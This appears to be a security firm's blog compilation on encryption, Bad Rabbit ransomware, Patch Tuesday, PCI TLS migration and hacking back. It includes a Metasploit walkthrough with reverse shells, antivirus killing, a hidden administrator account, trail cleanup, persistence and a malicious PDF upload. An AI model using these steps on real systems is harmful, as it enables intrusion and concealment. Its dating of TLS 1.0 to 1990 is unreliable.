When a server and a client require a secure encrypted communication, they send a query over the network to the other party, which sends back a copy of the certificate. The other party’s public key can be extracted from the certificate. A certificate can also be used to uniquely identify the holder.

SSL/TLS uses both asymmetric and symmetric encryption, and relies on digitally signed certificates issued by trusted certificate authorities (CAs).


Difference Between Symmetric and Asymmetric Encryption

  • Symmetric encryption uses a single key that needs to be shared among the people who need to receive the message while asymmetrical encryption uses a pair of public key and a private key to encrypt and decrypt messages when communicating.
  • Symmetric encryption is an old technique while asymmetric encryption is relatively new.
  • Asymmetric encryption was introduced to address the inherent problem of having to share the key in the symmetric encryption model, eliminating the need to share a secret key by using a public-private key pair.
  • Asymmetric encryption takes relatively more time than the symmetric encryption.


When it comes to encryption, the latest schemes are not necessarily the best fit. You should always use the encryption algorithm that is right for the task at hand. In fact, as cryptography takes a new shift, new algorithms are being developed in a bid to keep ahead of eavesdroppers and secure information to enhance confidentiality. Hackers are bound to make it tough for experts in the coming years, so expect more from the cryptographic community!

Credit: and

Do you know your friend, encryption?


Encryption is one of the many layers of security suggested by our team. To understand encryption, you need to know the main types of encryption used in today's technology. AES and RSA are the two major players in the encryption world. Even with free certificates, the security still rests on these algorithms. Let's start by discussing the fundamentals of the AES and RSA standards.


AES-256 Encryption

Advanced Encryption Standard (AES) is one of the most frequently used and most secure encryption algorithms available today. It is publicly accessible, and it is the cipher which the NSA uses for securing documents with the classification "top secret". Its success story started in 1997, when NIST (National Institute of Standards and Technology) officially started looking for a successor to the aging encryption standard DES. An algorithm named "Rijndael", developed by the Belgian cryptographers Daemen and Rijmen, excelled in security as well as in performance and flexibility.

It came out on top of several competitors and was officially announced as the new encryption standard AES in 2001. The algorithm is based on several substitutions, permutations and linear transformations, each executed on data blocks of 16 bytes – hence the term block cipher. Those operations are repeated several times, in so-called "rounds". During each round, a unique round key is calculated from the encryption key and incorporated in the calculations. Because of the block structure of AES, the change of a single bit, either in the key or in the plaintext block, results in a completely different ciphertext block – a clear advantage over traditional stream ciphers. The difference between AES-128, AES-192 and AES-256, finally, is the length of the key: 128, 192 or 256 bits – all drastic improvements over the 56-bit key of DES. By way of illustration: cracking a 128-bit AES key with a state-of-the-art supercomputer would take longer than the presumed age of the universe. And Boxcryptor even uses 256-bit keys. As of today, no practicable attack against AES exists. Therefore, AES remains the preferred encryption standard for governments, banks and high security systems around the world.

RSA Encryption

RSA is one of the most successful, asymmetric encryption systems today. Originally discovered in 1973 by the British intelligence agency GCHQ, it received the classification “top secret”. We have to thank the cryptologists Rivest, Shamir and Adleman for its civil rediscovery in 1977. They stumbled across it during an attempt to solve another cryptographic problem.

As opposed to traditional, symmetric encryption systems, RSA works with two different keys: A public and a private one. Both work complementary to each other, which means that a message encrypted with one of them can only be decrypted by its counterpart. Since the private key cannot be calculated from the public key, the latter is generally available to the public.

Those properties enable asymmetric cryptosystems to be used in a wide array of functions, such as digital signatures. In the process of signing a document, a fingerprint encrypted with RSA is attached to the file, enabling the receiver to verify both the sender and the integrity of the document. The security of RSA itself is mainly based on the mathematical problem of integer factorization. A message that is about to be encrypted is treated as one large number. When encrypting the message, it is raised to the power of the key and divided with remainder by a fixed product of two primes. By repeating the process with the other key, the plaintext can be retrieved again. The best currently known method to break the encryption requires factorizing the product used in the division. Currently, it is not possible to calculate these factors for numbers greater than 768 bits. That is why modern cryptosystems use a minimum key length of 3072 bits.


Keep updated with the cyber security standards by checking back to our news page. Our next writeup will be on asymmetrical and symmetrical encryptions.


Stay in touch by emailing or use our website. Click here to contact us.


Cyber Security Predictions - 2018

IDSS Cyber Security Prediction 2018


With the new year finally upon us, it is time to prepare for new cyber security compliance requirements and regulations. It is also time to prepare for new threats and attacks. Cyber crime is an evolving landscape, changing along with the defenses and security mechanisms.


One of the major changes for 2018 is related to the EU and GDPR compliance. Companies in the United States and other areas that do business within the EU will need to comply with this standard. This is a big change from Safe Harbor and the previous compliance standards. Contact IDSS for services to ensure your compliance.


Multi-Factor Authentication

We predict that 2018 will see the downward spiral of password-only authentication, with two-factor authentication on the upward spiral. This will not be limited to web-facing services; it will include internal services too. Passwords are easily cracked and socially engineered. Adding a second layer of authentication will improve security and authorization for services.


State Sponsored Cyber Attacks

We at IDSS are also predicting that state-sponsored cyber attacks will increase. The global cyber war is growing and becoming more relevant. The usual suspects for state-sponsored attacks are North Korea, Iran, and Russia. These countries don't have much to lose by continuing their attempts to extort, steal, spy and disrupt by infiltrating information systems. All are already heavily sanctioned, and the consequences, at least those we know about, in response to state-sponsored attacks have been minimal.


IoT Attacks

Millions of connected devices have little or no defense against hackers who want to gain control of them. In fact, it’s getting easier for hackers to take over scores of internet of things (IoT) devices. All they have to do is purchase a botnet kit from the dark web and they are in business.


Automation of some threat-detection tasks will increase

Security teams wade through massive volumes of alerts and data every day to determine what is or isn’t a likely threat. That volume will increase, driven by more attacks and more attack vectors. Filtering the alert data is repetitive, tedious work, which makes it a perfect candidate to automate using software.


With all the new attacks, we at IDSS sadly predict that consumers will lose trust in online transactions and become more aware of cyber security mechanisms. We at IDSS are changing our cyber security threat alerting and predictions. Contact us for more information.

The Rabbit is Running !

A new ransomware campaign has hit a number of high profile targets in Russia and Eastern Europe.

Dubbed Bad Rabbit, the ransomware first started infecting systems on Tuesday 24 October, and the way in which organizations appear to have been hit simultaneously immediately drew comparisons to this year's WannaCry and Petya epidemics.

Following the initial outbreak, there was some confusion about what exactly Bad Rabbit is. Now the initial panic has died down, however, it's possible to dig down into what exactly is going on.

1. The cyber-attack has hit organisations across Russia and Eastern Europe

Organisations across Russia and Ukraine -- as well as a small number in Germany and Turkey -- have fallen victim to the ransomware. Researchers at Avast say they've also detected the malware in Poland and South Korea.

Russian cybersecurity company Group-IB confirmed at least three media organizations in the country have been hit by file-encrypting malware, while at the same time Russian news agency Interfax said its systems have been affected by a "hacker attack" -- and were seemingly knocked offline by the incident.

Other organizations in the region including Odessa International Airport and the Kiev Metro also made statements about falling victim to a cyber-attack, while CERT-UA, the Computer Emergency Response Team of Ukraine, also posted that the "possible start of a new wave of cyberattacks to Ukraine's information resources" had occurred, as reports of Bad Rabbit infections started to come in.

At the time of writing, it's thought there are almost 200 infected targets, indicating that this isn't an attack on the scale of WannaCry or Petya -- but it's still causing problems for infected organizations.

"The total prevalence of known samples is quite low compared to the other "common" strains," said Jakub Kroustek, malware analyst at Avast.

2. It's definitely ransomware

Those unfortunate enough to fall victim to the attack quickly realized what had happened because the ransomware isn't subtle -- it presents victims with a ransom note telling them their files are "no longer accessible" and "no one will be able to recover them without our decryption service".

Bad Rabbit ransom note.

Image: ESET

Victims are directed to a Tor payment page and are presented with a countdown timer. Pay within the first 40 hours or so, they're told, and the payment for decrypting files is 0.05 bitcoin -- around $285. Those who don't pay the ransom before the timer reaches zero are told the fee will go up and they'll have to pay more.


Bad Rabbit payment page.

Image: Kaspersky Lab

The encryption uses DiskCryptor, which is legitimate open source software used for full drive encryption. Keys are generated using CryptGenRandom and then protected by a hardcoded RSA 2048 public key.

3. It's based on Petya/Not Petya

If the ransom note looks familiar, that's because it's almost identical to the one victims of June's Petya outbreak saw. The similarities aren't just cosmetic either -- Bad Rabbit shares behind-the-scenes elements with Petya too.

Analysis by researchers at Crowdstrike has found that Bad Rabbit and NotPetya's DLL (dynamic link library) share 67 percent of the same code, indicating the two ransomware variants are closely related, potentially even the work of the same threat actor.

4. It spreads via a fake Flash update on compromised websites

The main way Bad Rabbit spreads is drive-by downloads on hacked websites. No exploits are used, rather visitors to compromised websites -- some of which have been compromised since June -- are told that they need to install a Flash update. Of course, this is no Flash update, but a dropper for the malicious install.


A compromised website asking a user to install a fake Flash update which distributes Bad Rabbit.

Image: ESET

Infected websites -- mostly based in Russia, Bulgaria, and Turkey -- are compromised by having JavaScript injected in their HTML body or in one of their .js files.

5. It can spread laterally across networks...

Much like Petya, Bad Rabbit comes with a potent trick up its sleeve in that it contains an SMB component which allows it to move laterally across an infected network and propagate without user interaction, say researchers at Cisco Talos.

What aids Bad Rabbit's ability to spread is a list of simple username and password combinations which it can exploit to brute-force its way across networks. The weak passwords list consists of a number of the usual suspects for weak passwords such as simple number combinations and 'password'.

6. ... but it doesn't use EternalBlue

When Bad Rabbit first appeared, some suggested that like WannaCry, it exploited the EternalBlue exploit to spread. However, this now doesn't appear to be the case.

"We currently have no evidence that the EternalBlue exploit is being utilized to spread the infection," Martin Lee, Technical Lead for Security Research at Talos told ZDNet.

7. It may not be indiscriminate

At the same point following the WannaCry outbreak, hundreds of thousands of systems around the world had fallen victim to ransomware. However, Bad Rabbit doesn't appear to be infecting targets indiscriminately; rather, researchers have suggested that it only infects selected targets.

"Our observations suggest that this has been a targeted attack against corporate networks," said Kaspersky Lab researchers.

Meanwhile, researchers at ESET say instructions in the script injected into infected websites "can determine if the visitor is of interest and then add content to the page" if the target is deemed suitable for infection.

However, at this stage, there's no obvious reason why media organisations and infrastructure in Russia and Ukraine have been specifically targeted in this attack.

8. It isn't clear who is behind it

At this time, it's still unknown who is distributing the ransomware or why, but the similarity to Petya has led some researchers to suggest that Bad Rabbit is by the same attack group -- although that doesn't help identify the attacker or the motive either, because the perpetrator of June's epidemic has never been identified.

What marks this attack out is how it has primarily infected Russia -- Eastern European cybercriminal organisations tend to avoid attacking the 'motherland', indicating this is unlikely to be a Russian group.

9. It contains Game of Thrones references

Whoever is behind Bad Rabbit, they appear to be a fan of Game of Thrones: the code contains references to Viserion, Drogon, and Rhaegal, the dragons which feature in the television series and the novels it is based on. The authors of the code are therefore not doing much to change the stereotypical image of hackers being geeks and nerds.

References to Game of Thrones dragons in the code.

Image: Kaspersky Lab

10. You can protect yourself against becoming infected by it

At this stage, it's unknown if it's possible to decrypt files locked by Bad Rabbit without giving in and paying the ransom - although researchers say that those who fall victim shouldn't pay the fee, as it will only encourage the growth of ransomware.

A number of security vendors say their products protect against Bad Rabbit. But for those who want to be sure they don't fall victim to the attack, Kaspersky Lab says users can block the execution of the files C:\Windows\infpub.dat and C:\Windows\cscc.dat in order to prevent infection.



Contact IDSS for Prevention and resolution!




PATCH TUESDAY ALERT !! Microsoft needs you!

Microsoft today released patches for more than 60 CVE-listed vulnerabilities in its software. Meanwhile, Adobe is skipping October's Patch Tuesday altogether.

Among the latest holes that need papering over via Windows Update are three vulnerabilities already publicly disclosed – with one being exploited right now by hackers to infect vulnerable machines. That flaw, CVE-2017-11826, is leveraged when a booby-trapped Microsoft Office document is opened, allowing malicious code within it to run with the same rights as the logged-in user, and should be considered a top priority to patch.

Dustin Childs, of Trend Micro's Zero Day Initiative, noted today that users and administrators should also pay special attention to Microsoft's ADV170012, an advisory warning of weak cryptographic keys generated by Trusted Platform Modules (TPMs) on Infineon motherboards.

Essentially, you should install Microsoft's patch, which will generate new and stronger RSA keys in software as required, and next check to see if you should apply a firmware fix from Infineon.

Computers from HP Inc, Acer, Fujitsu, and others – even Chromebooks – as well as any hand-built machines using the blighted hardware, are affected by Infineon's TPM chipset bug. The flaw is not limited to Microsoft Windows: it affects all operating systems using the dodgy TPM. If you use BitLocker, biometric authentication, or similar, on the at-risk hardware, on Windows, you should sit up and read the following, though.

According to Microsoft:

This vulnerability is present in a specific vendor’s TPM firmware that is based on Trusted Computing Guidelines (TCG) specification family 1.2 and 2.0, not in the TPM standard or in Microsoft Windows. Some Windows security features and potentially third-party software rely on keys generated by the TPM (if available on the system).

Microsoft is releasing Windows security updates to help work around the vulnerability by logging events and by allowing the generation of software based keys. Even after the operating system and/or TPM firmware updates are installed, you will need to carry out additional remediation steps to force regeneration of previously created weak TPM keys, depending on the applicable services you are running and on your particular use-cases.

"While this doesn’t have the same broad attack surface as a vulnerability in a web browser, anyone who can [exploit the TPM bug] is likely a sophisticated and determined attacker," Childs said.

"While that remains unlikely, system administrators must take this critical-rated threat seriously."

Aside from the actively exploited Office flaw, the two other publicly disclosed but not yet targeted in the wild vulnerabilities are CVE-2017-11777, a cross-site scripting flaw in SharePoint Server, and CVE-2017-8703, an object handling error in the Windows Subsystem for Linux that would let a malicious app crash the machine.

A pair of flaws in the Windows font library, CVE-2017-11762 and CVE-2017-11763, can allow a web page or document to execute malicious code on a vulnerable computer: visiting a website or opening a file with a specially crafted embedded font can cause malware within the font data to run and hijack the PC.

The scripting engine in Internet Explorer and Edge has 19 flaws that could allow webpages to achieve remote-code execution, with the logged-on user's permissions, via memory corruption (CVE-2017-11792, CVE-2017-11793, and CVE-2017-11796, for example). Opening a webpage on a vulnerable computer can potentially trigger the execution of malware, spyware, ransomware, and other software nasties. The Windows Shell was found to contain two remote code execution flaws, CVE-2017-11819 and CVE-2017-8727, that can be targeted through Redmond's browsers: a dodgy webpage can attack Microsoft's text-handling code to potentially run malware.

Qualys analyst Jimmy Graham noted that this patch load is the fourth consecutive release to address a remote code execution bug in Windows Search, the latest being CVE-2017-11771. The flaw can be leveraged by firing specially crafted messages over the network to the machine's Windows Search service, injecting potentially evil code into the machine to run.

"As with the others, this vulnerability can be exploited remotely via SMB to take complete control of a system, and can impact both servers and workstations," said Graham.

"While an exploit against this vulnerability can leverage SMB as an attack vector, this is not a vulnerability in SMB itself, and is not related to the recent SMB vulnerabilities leveraged by EternalBlue, WannaCry, and Petya."

Elsewhere in the patch load was CVE-2017-11779, a remote code execution bug in the Windows DNS client that could be exploited by accidentally connecting to a malicious DNS server: more technical details on that can be found here. There's also a flaw in Windows TRIE (CVE-2017-11769) that lets DLL files achieve remote code execution, and a programming blunder that leaves emails in Outlook open to eavesdropping (CVE-2017-11776) over supposedly secure connections. According to Microsoft:

An information disclosure vulnerability exists when Microsoft Outlook fails to establish a secure connection. An attacker who exploited the vulnerability could use it to obtain the email content of a user. The security update addresses the vulnerability by preventing Outlook from disclosing user email content.

While the 62 fixes are a heavy load from Microsoft, admins can take heart in the knowledge that there won't be a Flash update to wrangle this month. Instead, Adobe said it would release an update to Flash Player that cleans up performance and stability bugs for the Windows, macOS and Linux versions.






Contact IDSS for mitigation services and consulting.

PCI says goodbye to early Encryption Protocols.

PCI DSS will say goodbye to a good ol' encryption protocol. We will not miss you!


Every company needs to prepare for the PCI compliance changes coming in 2018. In the beginning, using an encryption protocol such as SSL/TLS was sufficient. As the threat landscape evolves, compliance requirements must evolve too. With that said, as of June 2018, early versions of TLS will be considered a PCI finding, resulting in a non-compliant report.


What version will flag as vulnerable?


TLS version 1.1 or higher is the baseline requirement. TLS v1.2 is strongly encouraged by security professionals such as IDSS, in order to meet the PCI Data Security Standards for safeguarding payment data.


What is SSL/early TLS?


Transport Layer Security (TLS) is a cryptographic protocol used to establish a secure communications channel between two systems. It is used to authenticate one or both systems, and to protect the confidentiality and integrity of information that passes between them. It was originally developed as Secure Sockets Layer (SSL) by Netscape in the early 1990s. Standardized by the Internet Engineering Task Force (IETF), TLS has undergone several revisions to improve security, block known attacks and add support for new cryptographic algorithms, with major revisions to SSL 3.0 in 1996, TLS 1.0 in 1990, TLS 1.1 in 2006, and TLS 1.2 in 2008.


What is the risk of using SSL/early TLS?

There are many serious vulnerabilities in SSL and early TLS that, left unaddressed, put organizations at risk of being breached. The widespread POODLE and BEAST exploits are just a couple of examples of how attackers have taken advantage of weaknesses in SSL and early TLS to compromise organizations.

According to NIST, there are no fixes or patches that can adequately repair SSL or early TLS. Therefore, it is critically important that organizations upgrade to a secure alternative as soon as possible, and disable any fallback to both SSL and early TLS.


Are you susceptible to SSL/early TLS vulnerabilities?

Online and e-commerce environments using SSL and early TLS are most susceptible to the SSL exploits, but the 30 June 2018 PCI DSS migration date applies to all environments - except for payment terminals (POIs) (and the SSL/TLS termination points to which they connect) that can be verified as not being susceptible to any known exploits for SSL and early TLS.


What should organizations do if their ASV scan flags the presence of SSL and the scan fails?


You have until June 30th of 2018 to change settings to prevent SSL/early TLS protocols from being used. This can be configured on the server end, for all public-facing servers, including but not limited to POS terminals, email servers and web servers. You can submit a mitigation plan to your ASV (Approved Scanning Vendor) to allow the risk to be flagged as mitigated. This only gives you compliant reports until June 30th of 2018. After that date, you will be required to change the configurations to be compliant.


While 30 June 2018 is still a few months away, it takes time to migrate to more secure protocols and organizations should not delay:

  • Migrate to a minimum of TLS 1.1, preferably TLS 1.2. While it is possible to implement countermeasures against some attacks on TLS, migrating to a later version of TLS (TLS 1.2 is strongly encouraged) is the only reliable method to protect against the current protocol vulnerabilities.

  • Patch TLS software against implementation vulnerabilities. Implementation vulnerabilities, such as Heartbleed in OpenSSL, can pose serious risks. Keep TLS software up-to-date to ensure it is patched against these vulnerabilities, and have countermeasures for other attacks.

  • Configure TLS securely. In addition to providing support for later versions of TLS, ensure the TLS implementation is configured securely. Ensure that secure TLS cipher suites and key sizes are supported, and disable support for other cipher suites that are not necessary for interoperability. For example, disable support for weak “Export-Grade” cryptography, which was the source of the recent Logjam vulnerability.

  • Use PCI SSC resources. Visit the PCI SSC website for resources that can help with SSL/early TLS migration, including detailed guidance, a webinar and a number of FAQs.
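What an ASV scan does for the protocol-version part of this check, as an added example (not code from IDSS, PCI SSC or any scanner): for each of SSL 3.0, TLS 1.0, 1.1 and 1.2 the probe sends a bare ClientHello offering only that version, then reads whether the server answers with a ServerHello (version accepted) or an alert (version refused), and maps the result onto the migration rule described above. The `simulated_server` stand-in is constructed so the block runs offline; `tcp_exchange` is the real network path for servers you are responsible for, and the pre-TLS-1.2 cipher suites offered are an assumption that suits typical servers but may need changing for yours.

```python
import os
import socket
import struct

# Protocol versions as encoded on the wire (major, minor).
VERSIONS = {
    "SSL 3.0": (3, 0),
    "TLS 1.0": (3, 1),
    "TLS 1.1": (3, 2),
    "TLS 1.2": (3, 3),
}
# The PCI DSS rule above: SSL and early TLS fail after 30 June 2018,
# TLS 1.1 is the baseline, TLS 1.2 is strongly encouraged.
FAILS = {"SSL 3.0", "TLS 1.0"}
# Assumed: a few cipher suites that TLS 1.0-1.2 servers commonly accept.
CIPHER_SUITES = (0xC02F, 0x009C, 0x002F, 0x0035)


def build_client_hello(version: str) -> bytes:
    """Build a minimal ClientHello that offers exactly one protocol version."""
    major, minor = VERSIONS[version]
    suites = b"".join(struct.pack("!H", s) for s in CIPHER_SUITES)
    body = (
        bytes([major, minor])                          # client_version
        + os.urandom(32)                               # random
        + b"\x00"                                      # session_id: empty
        + struct.pack("!H", len(suites)) + suites      # cipher_suites
        + b"\x01\x00"                                  # compression: null only
    )
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body   # type 1, 24-bit length
    return b"\x16" + bytes([major, minor]) + struct.pack("!H", len(handshake)) + handshake


def parse_server_reply(data: bytes):
    """Return the version named in a ServerHello, or None for an alert (0x15) or junk."""
    if len(data) < 11 or data[0] != 0x16 or data[5] != 0x02:
        return None
    code = (data[9], data[10])        # 5-byte record header + 4-byte handshake header
    for name, wire in VERSIONS.items():
        if wire == code:
            return name
    return None


def probe(exchange) -> dict:
    """Try each version; `exchange(client_hello) -> bytes` performs the I/O."""
    return {name: parse_server_reply(exchange(build_client_hello(name))) == name
            for name in VERSIONS}


def tcp_exchange(host: str, port: int = 443, timeout: float = 5.0):
    """Real network I/O. Servers that require SNI may refuse this bare hello."""
    def exchange(hello: bytes) -> bytes:
        try:
            with socket.create_connection((host, port), timeout=timeout) as sock:
                sock.sendall(hello)
                return sock.recv(4096)
        except OSError:
            return b""
    return exchange


def pci_findings(results: dict) -> list:
    """Turn probe results into ASV-style findings."""
    findings = []
    for name, accepted in results.items():
        if accepted and name in FAILS:
            findings.append(f"FAIL: {name} accepted (SSL/early TLS)")
        elif accepted and name == "TLS 1.1":
            findings.append("WARN: TLS 1.1 accepted; migrate to TLS 1.2")
    if not results.get("TLS 1.2"):
        findings.append("FAIL: TLS 1.2 not supported")
    return findings


def simulated_server(lowest=(3, 1)):
    """Constructed stand-in for a server whose minimum version is `lowest`:
    replies with a ServerHello for versions it allows, else a fatal
    protocol_version alert (level 2, description 70)."""
    def exchange(hello: bytes) -> bytes:
        client_version = (hello[9], hello[10])
        if client_version < lowest:
            return b"\x15\x03\x01\x00\x02\x02\x46"
        body = bytes(client_version) + b"\x00" * 32 + b"\x00" + b"\x00\x2F" + b"\x00"
        handshake = b"\x02" + struct.pack("!I", len(body))[1:] + body
        return b"\x16" + bytes(client_version) + struct.pack("!H", len(handshake)) + handshake
    return exchange


if __name__ == "__main__":
    # Offline demo: a server that still allows TLS 1.0. For a real host use
    # probe(tcp_exchange("server.example", 443)).
    for finding in pci_findings(probe(simulated_server(lowest=(3, 1)))):
        print(finding)
```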




Contact IDSS for mitigation steps and consulting. We are here to ensure your compliance!



MSF Console Exploits Windows 10

Get connected:

[*] Started reverse TCP handler on 192.168.XX.XX:4444 
[*] 192.168.XX.XX:445 - Connecting to the server...
[*] 192.168.XX.XX:445 - Authenticating to 192.168.XX.XX:445|as user 'target'...
[*] 192.168.XX.XX:445 - Selecting PowerShell target
[*] 192.168.XX.XX:445 - Executing the payload...
[+] 192.168.XX.XX:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.XX.XX
[*] Meterpreter session 2 opened (192.168.XX.XX:4444 -> 192.168.XX.XX:49477) at 2017-09-13 09:39:54 -0700

Migrate from one process to another

meterpreter > run post/windows/manage/migrate

[*] Running module against Target-DT
[*] Current server process: powershell.exe (9632)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 14844
[+] Successfully migrated to process 14844

meterpreter > run post/windows/manage/migrate

[*] Running module against Target-DT
[*] Current server process: notepad.exe (14844)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 7632
[+] Successfully migrated to process 7632

Some more fun

Check for countermeasures on current system

meterpreter > run getcountermeasure

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]     Domain profile configuration (current):
[*]     -------------------------------------------------------------------
[*]     Operational mode                  = Enable
[*]     Exception mode                    = Enable
[*]     Standard profile configuration:
[*]     -------------------------------------------------------------------
[*]     Operational mode                  = Enable
[*]     Exception mode                    = Enable
[*]     IMPORTANT: Command executed successfully.
[*]     However, "netsh firewall" is deprecated;
[*]     use "netsh advfirewall firewall" instead.
[*]     For more information on using "netsh advfirewall firewall" commands
[*]     instead of "netsh firewall", see KB article 947709
[*]     at .
[*] Checking DEP Support Policy...

Let's try to kill the anti-virus now
meterpreter > use post/windows/manage/killav
Loading extension post/windows/manage/killav...
[-] Failed to load extension: No module of the name ext_server_post/windows/manage/killav.x86.dll found

Let's get some network info
meterpreter >  run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.X.0/
Local subnet: 192.168.X.0/

Now, let's set up an RDP connection
meterpreter > run getgui -u target\target -p ************

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez
[*] Setting user account for logon
[*]     Adding User: targettarget with Password: ***********
[*]     Hiding user from Windows Login screen
[*]     Adding User: targettarget to local group 'Remote Desktop Users'
[*]     Adding User: gtargettarget to local group 'Administrators'
[*] You can now login with the created user

Let's test the RDP connection
joey@sil3ntz:~$ rdesktop -u targettarget -p ********* 192.168.X.XX
Autoselected keyboard map en-us
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
Connection established using SSL.

<insert screenshot>

BOOM !  Access confirmed.

You can confirm access and user creation in the control panel of the compromised system

OK, let's clean up the trail now

meterpreter > run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20170913.5300.rc
Console Multi Command Execution Meterpreter Script 

Let's migrate to another process to stay ahead of the AV software

meterpreter > run post/windows/manage/migrate

[*] Running module against Target-DT
[*] Current server process: notepad.exe (7632)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2532
[+] Successfully migrated to process 2532

Let's check the privileges on this system

meterpreter > getprivs
Enabled Process Privileges

Now let's PWN the system
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Run this in the background to exploit some more

Don't forget to migrate !

meterpreter > background 
[*] Backgrounding session 2...


msf exploit(psexec) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > show options 

Module options (exploit/windows/local/bypassuac):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION                     yes       The session to run this module on.
   TECHNIQUE  EXE              yes       Technique to use if UAC is turned off (Accepted: PSH, EXE)

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf exploit(bypassuac) > set session 2
session => 2


msf exploit(bypassuac) > exploit 

[*] Started reverse TCP handler on 192.168.X.XX:4444 
[-] Exploit aborted due to failure: none: Already in elevated state  <---- BOOM !!
[*] Exploit completed, but no session was created.
msf exploit(bypassuac) > 

Let's make this a persistent connection

msf exploit(bypassuac) > set payload windows/meterpreter/reversetcp
[-] The value specified for payload is not valid.
msf exploit(bypassuac) > show options 

Module options (exploit/windows/local/bypassuac):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION    2                yes       The session to run this module on.
   TECHNIQUE  EXE              yes       Technique to use if UAC is turned off (Accepted: PSH, EXE)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.X.XX    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

meterpreter > run persistence -A -L c:\\ -X 5 -p <port> -r <your-ip>

Now let's upload a malicious file, which we created in an earlier class. It has a reverse TCP connector embedded.

meterpreter > upload /home/joey/Documents/exploits/Insurance_Updates.pdf C:/Users/target/Desktop
[*] uploading  : /home/joey/Documents/exploits/Insurance_Updates.pdf -> C:/Users/target/Desktop
[*] uploaded   : /home/joey/Documents/exploits/Insurance_Updates.pdf -> C:/Users/target/Desktop\Insurance_Updates.pdf

Hacking Back the Hackers -- Should you?

I have been hacked !!  I am going to attack !!

Let's not mince words: Cyberattacks suck. Whether criminals are hacking our passwords, or Anonymous is simply making a statement, the disruptions and data breaches exact a heavy toll in terms of time, money, and security. For example, after the Associated Press Twitter account was hacked and bogus news was posted about an attack on the White House, the U.S. stock market took a nosedive.

The often dire consequences of cyberattacks have the attention of the highest levels of government. Just yesterday, U.S. senators called on the Obama Administration to pursue sanctions against countries believed to be active in cyberattacks. Cybersecurity is one of the issues Secretary of State John Kerry will discuss when he visits Japan this month.

All this talk is great, but back in the here and now, the situation is tough. When cyberattacks occur—and they will—there’s little you can do except control the damage. Unless you hack back, that is.

Digital revenge is sweet—and illegal

Loosely defined, "hacking back" involves turning the tables on a cyberhacking assailant: thwarting or stopping the crime, or perhaps even trying to steal back what was taken. How that digital revenge is wreaked, and whether any of it is legal, are issues being actively debated right now—to the extent that anyone wants to talk about it, let alone admit to trying it. But there's one thing security experts can agree on: Hack-backs are a tempting response to a frustrating situation.

Hacking back at a cyber-assailant is tempting, but it's just as illegal as the original cyberattack.

Let’s talk about the illegal part first. Even if we skip the obvious moral issues around vigilante justice, hacking back quickly runs afoul of the Computer Fraud and Abuse Act. This law has undergone numerous revisions since it was first enacted in 1986, but Title 18, Sec. 1030 is clear on the point that using a computer to intrude upon or steal something from another computer is illegal.

“There is no law that actually allows you to engage in an attack,” says Ray Aghaian, a partner with McKenna Long & Aldridge, and a former attorney with the Department of Justice’s Cyber & Intellectual Property Crimes Section. “If you attack an attacker, you’re in the same boat," he says.

The only kind of hacking back that's considered tolerable is what you might enact defensively within your own computer or network. What’s clearly illegal are offensive hacks, where you leave your territory and actively pursue an assailant online.

Counterintelligence as a service

Even if companies can't hack back, they can learn more about their assailants. Eric Ahlm, a Security Research Director with Gartner, sees a burgeoning business in gathering information about cybercriminals. “The world of counterintelligence as a service is certainly growing,” says Ahlm.

According to Ahlm, the companies tracking the bad guys collect vast amounts of data on Internet activity and can hone in on specific “actors” who engage in criminal activity. “Without touching or hacking the individual, they can tell you how trustworthy they are, where they are, what kind of systems they use," says Ahlm. "They could link a device to an identity.”

While private companies cannot take offensive action with any such intelligence, they can use it defensively to thwart suspicious actors if they're found to be sniffing around company data. “Based off your intelligence of who’s touching you,” says Ahlm, “you can selectively disconnect them or greatly slow them down from network access.” The simple act of slowing down access may be enough to motivate some hackers to look elsewhere.

Fighting back has its risks

Slowdown tactics are routine for CloudFlare, a company that supports websites with performance optimization, security, and other technologies. “In the grand scheme of fight-back tricks, this is one that causes relatively little harm but does a lot of good," says Matthew Prince, co-founder and CEO. "If we are tying up a bad guy’s resources, they have less time to attack the good guys.”

The risk with hacking back is that the assailant could retaliate, escalating the danger.

While cybersecurity is an integral part of CloudFlare’s business, Prince cautions that any interaction with attackers carries risk. “Some people out there are real criminals. They have a way of fighting back," he says.

Prince cites the example of Blue Security as a cautionary tale. This company drew raves—as well as criticism—for creating a way to spam back at spammers, clogging their systems and preventing them from sending out more spam. But the spammers fought back, unleashing attacks on Blue Security that caused collateral damage on the Internet. The company eventually closed down operations. “You can easily get in over your head,” says Prince.

Hacking back may never be legal

Now that data represents the biggest asset of many companies, the desire to protect that data intensifies and makes offensive measures seem almost a business imperative. Could some form of legal justification be far behind? If hack-backs were ever legalized, Aghaian says, “there needs to be proportionality." In other words, the hack-back can’t be worse than the original hack. The complexity of determining proportionality, however, is one of many reasons why hacking back may never surmount its significant moral, legal, and practical issues.

Hacking back can also have unintended consequences, such as damaging hijacked computers belonging to otherwise innocent individuals, while real criminals remain hidden several layers back on the Internet. If you hack back and hurt someone else instead, “you have to be willing to bear the consequences and pay for the damages,” says Aghaian.

